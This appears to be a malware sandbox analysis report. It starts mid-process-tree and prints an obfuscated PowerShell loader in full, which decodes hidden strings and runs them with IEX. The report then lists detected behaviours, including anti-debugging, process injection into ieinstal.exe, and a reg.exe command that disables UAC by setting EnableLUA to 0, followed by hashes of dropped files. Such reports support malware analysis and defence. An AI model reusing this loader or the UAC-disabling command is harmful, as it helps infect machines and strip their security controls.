a7Fu3 C3RyD N3 S0St2PeBHa7QuBEx7 CFre1KlC U3epAPo2Or8 T2 NFUn2 G9Xy3 a4ce3 IF B3 e2Un2Ou8So3In0Mo7 FB R7 DFAp0Sv8Go3St3Tr3 FA a2AnDSt3RhE H2VeF a3PrA C3En2Af3Bo7 S6ImFDi7 S2Im7Se7Be7CoBBa7Fo3Cl1agCFr1AmF I0MoFHy7RhBFy1TiB N7Au3Ba0Am0Ak1Ku2 D3de5 i2 SF I6Su8Ud6 A9Di0De6Ga7 F7po7JeBBa0Ut0Ap1me2Mn3 U5Bu2NeF H6St8 R6Me9Un0 B6 B7 W7 M7 LB A0Im0Do1Li2Hu3Sk5Po2PrFDo6Su8Ma6do9Op0Vr6In7 U7He7DeB T0 S0se1 C2So3 U5Se2TaFAm6Un8 S6Re9Da0ne6 V7Kt7As7 PBDe0 T0 b1 T2 R3 M5Dr2 OF e6Wo8Co6Re9St0Sa6Re7Br7 V7 DBpl0No0Ga1su2 S3To5Sn2 TFCh6Le8Ra6Ge9 A0 D6Ve7Ad2Ma7ShBBa7Si3Pe0Ba0Re1 H2To3 S5Sy2TuFMa6Ta8Un6 I9Is0ri6 F7 I2 M7An2Su7Hy2Ar'Fa)Do;Ba&Re(Ga`$VlSSeh PaNovUpe FtDea TiJelGa7 T) K N(BevPla MrReeLal Aa Mg CrWieHysFn0Fy4Vi B' I7 AF T3 A6Sk3 T4pa2 d8 A2id8ef3JeEVe2 O9Ej3Fo5br3MiETr2Re8Tr7InBFe6 F6Dr7ImB I0 T0Su0An8Sn2 F2 R2 B8Et2TrF N3FoE K3Vo6 T7 W5ch0Bi9Ni2BeEFe3 T5Ty2 TFTr3Or2 B3St6 S3ReE K7 I5 E1 S2 L3Ko5 C2LaFDi3SkE T2 u9 M3Ru4Bi2miB S0Ov8El3 AE Z2Ku9Un2BlDSt3 N2 A3 P8 M3 SEHy2An8 P7An5Ca1 C6Re3PaA G2 w9 P2So8Pa3 B3Gp3 KA H3 F7 J0 F6Te6Da1sv6 Z1 B1SeCMe3TiEBl2DoFUn1ImFto3 oESv3Re7Ca3LeE R3VrC K3 LABo2LiF I3 OE V1 PD H3 S4Fu2gr9 M1SeDRh2 IECa3Br5 D3Ud8 p2 aFRe3 H2Om3 E4As3La5Tr0GaB A3 S4 C3 B2 F3No5 G2GiF U3AtEJu2 H9 T7Fr3Un7 S3 N3xyDIv3El0Di2EnBWa7ErBfi7 AF O1 SC s3NoAMy2Su8 R2 SFPr2Un9 K3do4Os3 TFMo3 L2Ta2Bi8 R3Dr0 D7LbB R7 IF S0Ko8 U3Te3 U3OvA L2RaDPu3AnE C2GrFWa3ReA F3 R2im3St7Fl6 AD T7Pr2Le7Ca7 H7HoBRo7It3 T1 KC C1GrFSe0UnFNo7 lB L1InBSt7Th3An0Pa0Pa1 C2Tr3Fo5 L2ImF P6Ne8Et6fo9 R0 L6 U7 W7 o7 HBDg0Se0An1ns2Fl3Sk5Le2HaF F6 T8Af6Re9Pr0 V6Lu7Ov7 S7MuBNo0 M0in1 P2 G3Hl5 K2PrF E6 I8Ba6Sc9La0 S6Hi7An7 V7TrB S0 F0 S1 M2Li3al5 A2 SFSa6Sh8 S6 Y9 J0Li6Un7ro7Pr7 BB M0Sv0Br1Pa2Ya3 V5Gi2PaFny6 T8Er6El9Pl0To6Da7 M2So7ChBTo7Ma3An0 R0Am1Je2Bo3 K5 F2TrFKo0 AB T2 SF L2Ti9Un0 O6Ta7Fo2Sv7 S2 Q7Vi2 A'Re) A; U&Ko( t`$OvS Mh Da PvHae OtCuaDei SlLy7 D)As Sl( Cv EaBar Oe Ilnia OgDarInecosSt0Pa4Hl In'Im7 FFPi2 UFsc2Ga9 D3Vi2Ti3Po9 S3 DAFe3 SF C3SmECl3Bo5Sl2An8Be7CuB B6 P6Rs7 sB P7 SFBr0 A8 S2StF F3Op4 A2RaB S3 D5 D3re2Ze3Go5Ta3goC L6 PAMo6 KASt7Bl5Pr1Un2 U3 F5Ba2 UDVa3Fa4 Z3So0Fa3 EEMa7Pr3 J7Re6Sa6AnA B7 a7Co6HeBVi7 r7 S6 LD R6 dFLi7 S7He6 SB K7Aa7Sy7PiB B6Le3Om6Ud8Bl6AfBMa6 HC R6HeBDi6re2We6ReC M6 ADMa7Ta7Ma6 SBBy7ge2 K' L)Fo;Bu&Mr( S`$ BS Fh TaBuvRoe PtLea KiBal M7No) I s(DuvAbaCarHve HlDaaGeg Sr Re Tsam0 K4Th P'Gr7 SFSy0WaF T3TeASu3 B7Mi3 bCMe3 P0 P3 T2Kn2gs9 S2 TFMc3Co7Gr3VaEte2 C9 S7 RBEn6Re6So7EnBFj7OrFOp3So6ge3Pe4Co2Pl8Pa2 P8 p3 AE M2 P9Fo3 P5Se3BrE O2 F8 W7 R5 E1St2Vo3nu5Ri2UdD J3 V4 D3st0 o3ClERe7 K3be7 MFPi2 sFLo2Fa9 T3 H2Un3Mo9 A3 TAIm3 SF L3StESj3Ca5 S2Ph8To7 S7Pl6FeBSe0Re3Bo6Ge9 E6Me9 S7To7Pa6 LBKv7Sr7Su6PaBPa7 F7Kr6 TB G7Se2 V'Du)Wa;To`$haF FrNioDin Cd Pl IeFotKa2 G= p`""" G`$bae Bn RvFo: OTNoEHeMUnP p\NeHSke Ht CeAkrBro tkVaaPorSayExo NtPriBic S\ TMcoa pl HaPar DkMiiAfeCos s\ ITSkuSkg Ft ReMumKreDvsAntInr NeSnn AeDosBo\ExUSunGrsSia StNoi OrAmi AcLeaudlPe.ReS pp Si O6Ex0 T`""" I; I&De(Ov`$FrS IhpaaFevAdeUnt LaChi JlDi7 A)Pr P( Vv LaSerImeAnlBiaDig KrLaePlsPa0dr4El b'Ti7frFFa1 S8ov3AnACl3 F8De3Ol4 P3CoE g2 SB S2or2To7MaBBe6Tv6 T7 SB D0Pa0La0Te8Ch2Pe2Th2Sy8 G2 GFLi3 FE P3Bi6Sa7Mi5Fr1Vr2 U1Fr4Do7Za5Vi1 SD b3 D2Di3 W7st3 sETr0tr6Sp6al1Ch6 b1Un0Ax9Sk3PaEId3KlACo3ExFMa1ReA n3 B7 A3St7Un1Ti9In2Ov2 G2OvF S3 lEPh2Ly8Sa7 I3Ep7BrFFi1 FD V2 U9 S3Nu4 H3 A5 B3RiFSe3Al7Hy3FoE r2ReFAx6 F9Sk7 V2To'Dr)Ro;En`$MiFHoi DnTri CsDi=Fr`$ PC LaNocTioBoePep kyKi.Unc MoTiuFrn Ft R- T1su0La2Do4Vu;Ti&Zo( f`$KaSsph CaravBdeRetNua siMelIm7 s) d U( SvCaagirarePoleraMeg srCoe Is A0Sy4Ch Pe'po0yo0Ca0Bl8 K2Ma2Me2 F8Kr2 CFSk3taE A3Va6ca7Re5 T0Vo9 E2 mE E3Fa5Sw2KaFFn3 P2 E3 G6In3MoE f7In5be1Bo2Bu3Fl5Le2 XF D3NiEps2 H9 f3 N4Ub2 IB P0Pe8 P3LoE o2 P9 A2PeDVa3Ho2 N3Sk8Es3DaEUg2Re8 V7No5 L1Ho6 B3KlAbu2Qu9 O2 I8He3Ha3 r3ClAGi3St7Un0 D6 I6Ou1 K6me1Ce1 S8 T3Eg4Sy2 TBUd2Br2Co7St3Sg7grFNe1La8Ch3TrA K3Fo8 T3 V4Pl3 DESn2TaBss2Au2 T7Ob7Le7 HBFo6 HAMa6 OB s6Ab9Co6KeFEr7Ed7ak7MoB M7 BFIn0 PFIb3TiA K3Ud7 M3KaCSt3Ro0 D3 B2fi2 p9In2AfFTr3 B7Ca3 DEKa2ec9Fo7 R7Wa7 SB S7 SF I1 ND S3 B2Sy3To5Ca3Pu2 p2Pl8Mi7 f2 P'Ov)Wi; G&In( T`$BoS Lh UaSevEke ItTaaRni PlSo7re)Tr Me( PvKoa Pr De KlQua SgAnrSte NsNi0ni4My Je' G7 IF A1Ss6 C3 U2An2Me8 S2UnBCo3Sw7Aq3 TENu3arA S2 P8 P3 GENe7PaB M6 M6 A7 nBOl0No0Ga0Ru8 Z2Ov2 U2an8Ch2DeFPa3 UE T3Bl6 F7He5 H0Ce9 D2 ZENi3 B5 K2 UF m3Wa2ce3 A6 m3PaEUt7Ce5Ni1ae2 a3 P5Ly2HoFPo3GnE l2En9 S3Ro4Fo2DiBKo0 C8In3NuE A2Ko9St2KaD H3 K2No3Bv8 B3AaERe2mi8ra7 B5cy1 O6 S3 KATe2Pi9Hj2Pr8St3 E3 S3BlA A3Al7 N0 M6Me6Ch1Sl6 k1Ab1JeCMo3 BE S2HoFLi1TuFVi3KaESu3 S7 L3ThE T3KaCPo3MuAVe2MeF T3HaEGe1 VDMa3 U4Ug2 K9Fr1SiD B2 OESa3Pa5 a3 S8Ji2CeFDi3Ba2Ma3Ce4Sc3Bi5 B0MiB E3He4Te3Th2 B3Pa5 T2 IFCo3taE S2Ku9 U7Un3fi7 A3 A3HaDIc3Ha0 d2 EB C7unB A7GeFSl1 HCOm3BaA F2 R8St2 SF T2 S9fn3Le4Ku3 BFFr3Di2Th2Re8 K3Ro0 T7ViBTy7UdFSi1Sa3ve3 K4Su3Mu9Ko3Me9 S3 PEPr2 U8 S7 D2 H7un7 D7GrBSy7 D3 K1 BCAf1 GF b0foFSu7TlBSp1 BBLu7 S3su0St0Ey1 S2Un3 P5 P2brF A0 CB K2AmFMy2 G9Pr0 R6 H7 S7Ld7PeB P0Se0Un1 f2bo3 T5Fi2TuF B0SpBBa2SaFAg2Ny9 E0te6Of7 H7gr7PrB L0 B0La1 K2 C3 I5Up2OvFab0 CB G2 IFPe2An9 J0 D6Sl7St2Aw7 NB R7Re3 K0 P0Li1 D2 D3 G5St2 OFDr0 FB D2 BFBr2 V9An0 G6He7 S2 M7 B2Ka7 C2Ta'Ub)la; G&Sm(Be`$ SS HhBra EvBue EtDoa Ai alCi7ri) P To( SvEjaLurDieUdlunaPog Rr feadsDi0 F4Pr Ud'Rh7thF S1Ru6 a3Pl2Sk2Cl8la2 PBZe3 R7 F3 OEBr3ThABr2Ep8Pr3 DESe7Cu5 S1 M2 S3In5 M2 JDSv3 F4do3Ov0Ja3 TE S7 G3 C6 IBsu7Fo7Tr7ReF c0 SF B3 BAKo3 M7Sm3 MC B3 C0Br3Ma2Th2 A9Mb2FlFSp3 F7 O3 CE H2 K9Bo7Sm7Re6 SBDe7at2Cy'Po)Jo#Ph;""";Function Pedotrophic1919 { param([String]$Liefsome); For($Osmogene=2; $Osmogene -lt $Liefsome.Length-1; $Osmogene+=(2+1)){ $varelagres = $varelagres + $Liefsome.Substring($Osmogene, 1); } $varelagres;}$Rutine0 = Pedotrophic1919 'InIBiEpaXha ';&$Rutine0 (Pedotrophic1919 $Branches);<#Skaberakkers Beplantede Septariate Trangsvurderingers Tabpositionernes Prdikatnavnets #>;"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- Modifies registry key
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
258B
MD5dbf78ad54f17edaf17d9f36b85e1304e
SHA17df804f90b29c6ae663fc2d7c655854a4ab4049d
SHA256f0ee7dae9eb619d14eb0746755f0fe81ff8e9ba731eb71047885c27a1ea85042
SHA5128337e7667c798f5533e2eed6e441c79fe785ac6b1e3f71e25704e087c0451de7810664d981e824a2c452359d39786cda50bc77d3b69e728e4743b59cf837755d
-
Filesize
19KB
MD5a2b15124d434d7e0bd0e16d933c473c8
SHA10c920467fd710a9affae102b406e9a6d9269c357
SHA256c7481f4d7ee5548210d8b04473da15e5a8e7fe61e183a3614e706f4143ecb018
SHA5123389240a8588f9f49c6a15c3ea85c41b722e9617a746713a95f4b728d10086476ed18f645ca61a0ef8bfa85dd79ee78c1b9bf9ea5e77235f7e7045c26c892888
-
Filesize
277KB
MD52e012f36a90dee4bf1d6e005ebec36e5
SHA1771626c509aa9e33b0752fb7d5a115534cc3ad81
SHA2562abb96a5c9f09263cd6120f1b15d01c7d2cd32cdefd0b9a6de3233248d4413f9
SHA51272519e1750c2f99d5398bc03bff9a137fc8edf7169e66ce1720e8eb5899a4931fcb357b729791ee91c8af7ca0422c6fb39981c772ae4e19514f0edc0b5aac26c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
600KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
120KB
-
Filesize
216KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
79.2MB
-
Filesize
2.2MB
-
Filesize
79.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
2.2MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.5MB
-
Filesize
64KB